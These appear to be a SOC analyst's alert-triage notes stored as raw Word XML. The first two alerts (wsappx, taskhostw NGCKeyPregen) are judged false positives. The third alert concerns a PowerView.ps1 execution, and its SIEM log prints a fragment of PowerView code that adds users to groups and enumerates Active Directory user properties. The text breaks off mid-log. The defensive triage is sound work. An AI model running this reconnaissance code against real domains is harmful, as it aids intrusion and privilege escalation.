    <w:p w14:paraId="26396CA1" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve">svchost.exe -k </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>wsappx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04092E3D" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:r w:rsidRPr="003C6E6A">
        <w:t>indicates that this instance of svchost.exe is running the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>wsappx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>" service group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3F9427" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve">What </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>wsappx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>wsappx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve"> is a legitimate Windows service container.</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t>It includes two services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75238CA2" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>AppX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve"> Deployment Service (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>AppXSVC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD7156A" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>Client License Service (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>ClipSVC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295D795F" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:r w:rsidRPr="003C6E6A">
        <w:t>These services handle Windows Store app installations, updates, licensing, and related infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020600B7" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>wsappx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve"> commonly consumes CPU during app installation, updates, or background maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B561FBB" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>Is this normal?</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t>Yes.</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t xml:space="preserve">services.exe launching svchost.exe with a service group parameter (-k </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>wsappx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve">) is standard Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720C2C10" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>Why the alert fired</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t xml:space="preserve">The SIEM flagged it because </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>wsappx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve"> does not run constantly, so the parent-child relationship may appear "uncommon."</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t xml:space="preserve">However, this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t xml:space="preserve"> is completely normal for Windows and is not associated with malicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58035E91" w14:textId="77777777" w:rsidR="003C6E6A" w:rsidRPr="003C6E6A" w:rsidRDefault="003C6E6A" w:rsidP="003C6E6A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>Final conclusion</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t>This is a false positive.</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6E6A">
        <w:br/>
        <w:t xml:space="preserve">services.exe → svchost.exe with "-k </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>wsappx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C6E6A">
        <w:t>" is normal Windows service initialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18276D" w14:textId="1F869A07" w:rsidR="003C6E6A" w:rsidRDefault="00B80E87" w:rsidP="00107FAD">
      <w:r>
        <w:t xml:space="preserve">NEXT – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36448CF5" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B80E87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Process details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE0759B" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:r w:rsidRPr="00B80E87">
        <w:t>Child process: taskhostw.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B80E87">
        <w:br/>
        <w:t>Parent process: svchost.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B80E87">
        <w:br/>
        <w:t xml:space="preserve">Command line: taskhostw.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B80E87">
        <w:t>NGCKeyPregen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B80E87">
        <w:br/>
        <w:t>Working directory: C:\Windows\system32\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040CBD03" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B80E87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. What taskhostw.exe is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BBDFBF" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:r w:rsidRPr="00B80E87">
        <w:lastRenderedPageBreak/>
        <w:t>taskhostw.exe is a legitimate Windows process called “Host Process for Windows Tasks.”</w:t>
      </w:r>
      <w:r w:rsidRPr="00B80E87">
        <w:br/>
        <w:t>Its purpose is to load and execute DLL-based tasks and background components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D83A369" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:r w:rsidRPr="00B80E87">
        <w:t>It is normal for taskhostw.exe to appear with different arguments depending on the task being run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20EB41" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B80E87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. What “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B80E87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NGCKeyPregen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B80E87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>” means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEDFD0D" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B80E87">
        <w:t>NGCKeyPregen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B80E87">
        <w:t xml:space="preserve"> refers to “Next-Generation Credentials Key Pre-generation.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3811866F" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:r w:rsidRPr="00B80E87">
        <w:t>This is part of Windows Hello and Windows authentication infrastructure.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B80E87">
        <w:br/>
        <w:t>It is responsible for generating or refreshing keys used for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F1855" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B80E87">
        <w:t>Windows Hello PIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42353DB6" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B80E87">
        <w:t>Biometrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D37E0" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B80E87">
        <w:t>Credential protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A54E2A" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B80E87">
        <w:t>User authentication keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB4672A" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B80E87">
        <w:t>Secure login mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E6A228" w14:textId="77777777" w:rsidR="00B80E87" w:rsidRPr="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00B80E87">
      <w:r w:rsidRPr="00B80E87">
        <w:t>This task runs in the background and is usually triggered by Windows authentication services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1786438F" w14:textId="57EC8958" w:rsidR="00B80E87" w:rsidRDefault="00B80E87" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00B80E87">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="285DD567" wp14:editId="22ED6E69">
            <wp:extent cx="5731510" cy="1889760"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="89710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10550" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1889760"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F958ABA" w14:textId="02B81C8E" w:rsidR="00B80E87" w:rsidRDefault="00D47B79" w:rsidP="00107FAD">
      <w:r>
        <w:t>So it is a false positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727689EA" w14:textId="73F10962" w:rsidR="00D47B79" w:rsidRDefault="00D47B79" w:rsidP="00107FAD">
      <w:r>
        <w:t xml:space="preserve">NEXT – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33604237" w14:textId="58DA10C7" w:rsidR="00D47B79" w:rsidRDefault="00D47B79" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00D47B79">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53264D00" wp14:editId="20A506DB">
            <wp:extent cx="5731510" cy="2026920"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2045488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488082" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2026920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Now a user creating a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> executable file on his PC raises suspicion as it may not be him but instead someone else executing malicious scripts. So upon going through SIEM events we find out that it is actually executing a remote script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02659BE7" w14:textId="7F86D45C" w:rsidR="00D47B79" w:rsidRDefault="00D47B79" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00D47B79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PowerView.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47B79">
        <w:t xml:space="preserve"> is a well-known </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47B79">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>post-exploitation / AD reconnaissance</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47B79">
        <w:t xml:space="preserve"> script used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D47B79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerShell Empire</w:t>
      </w:r>
      <w:r w:rsidRPr="00D47B79">
        <w:t xml:space="preserve"> and by red-teamers/attackers after gaining access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6197DF0F" w14:textId="13E63950" w:rsidR="00D47B79" w:rsidRDefault="00F17D05" w:rsidP="00107FAD">
      <w:r>
        <w:t xml:space="preserve">Upon searching in event logs the following script was found :- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3BCC56" w14:textId="715AA1E9" w:rsidR="00F17D05" w:rsidRDefault="00F17D05" w:rsidP="00107FAD">
      <w:r w:rsidRPr="00F17D05">
        <w:t>{"datasource":"powershell","timestamp":"11/23/2025 06:09:35.913","file.path":"C:\\Users\\michael.ascot\\downloads\\PowerView.ps1","event.action":"Execute a Remote Command","</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>powershell.file.script_block_text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>":" } else { # otherwise, get the local machine context Write-Verbose \"Adding user $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> to $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>GroupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> on localhost\" $Context = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine, $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>Env:ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>) } # find the particular group $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($Context,$GroupName) # add the particular user to the group $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>Group.Members.add</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>($Context, [System.DirectoryServices.AccountManagement.IdentityType]::SamAccountName, $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>) # commit the changes $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>Group.Save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>() } catch { Write-Warning \"Error adding $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> to $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>GroupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> : $_\" } }}function Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> {&lt;# .SYNOPSIS Returns a list of all user object properties. If a property name is specified, it returns all [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>user:property</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve">] values. Taken directly from @obscuresec's post: http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html .PARAMETER Properties Property names to extract for users. .PARAMETER Domain The domain to query for user properties, defaults to the current domain. .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> Domain controller to reflect LDAP queries through. .PARAMETER </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> to set for the LDAP searcher object. .EXAMPLE PS C:\\&gt; Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -Domain testing Returns all user properties for users in the 'testing' domain. .EXAMPLE PS C:\\&gt; Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>UserProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -Properties </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ssn,lastlogon,location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> Returns all an array of user/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ssn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>lastlogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>/location combinations for users in the current domain. .LINK http://obscuresecurity.blogspot.com/2014/04/ADSISearcher.html#&gt; [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>CmdletBinding</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>()] param( [String[]] $Properties, [String] $Domain, [String] $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>, [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>ValidateRange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>(1,10000)] [Int] $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> = 200 ) if($Properties) { # extract out the set of all properties for each object $Properties = ,\"name\" + $Properties Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>NetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -Domain $Domain -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> | Select-Object -Property $Properties } else { # extract out just the property names Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>NetUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -Domain $Domain -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>DomainController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t>PageSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F17D05">
        <w:t xml:space="preserve"> $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
